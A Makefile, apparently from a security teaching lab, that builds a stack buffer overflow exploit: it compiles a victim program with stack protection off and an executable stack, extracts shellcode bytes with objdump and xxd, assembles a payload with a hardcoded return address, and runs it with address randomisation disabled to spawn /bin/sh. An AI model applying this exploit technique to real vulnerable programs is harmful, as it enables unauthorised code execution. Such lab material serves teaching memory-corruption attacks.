# This is an attempt to automate the construction of an attack against
# the victim program that executes a shellcode to open /bin/sh.
#
# The scripts try to obtain all parameters but you need to set the
# memory location of the buffer on the stack below (printed to the
# stderr by the victim for convenience).
#
# If the 'make attack' target succeeds, you end in an non-interactive
# shell; try typing shell commands to see that you actually are in a
# shell.

BUFFER	= 0x7fffffffe390

all: victim shellcode shellcode.hex attack.bin

victim: victim.c
	gcc -fno-stack-protector -z execstack -o victim victim.c

shellcode: shellcode.c
	gcc -o shellcode shellcode.c

shellcode.hex: shellcode
	n0=0x$$(objdump -d shellcode | awk -e '/needle0/ { print $$1 }'); \
	n1=0x$$(objdump -d shellcode | awk -e '/needle1/ { print $$1 }'); \
	len=$$(($$n1-$$n0)); \
	len=$$(echo "a = 1; while (a < $$len) { a *= 2; }; a" | bc); \
	xxd -s $$n0 -l $$len -p shellcode shellcode.hex

attack.bin: shellcode.hex Makefile
	a=$$(printf %016x $(BUFFER) | tac -rs..); \
        (cat shellcode.hex; printf %080d 0; echo $$a) | xxd -r -p > attack.bin

attack: victim attack.bin
	cat attack.bin - | setarch $$(arch) -R ./victim

clean:
	rm -f victim shellcode attack.bin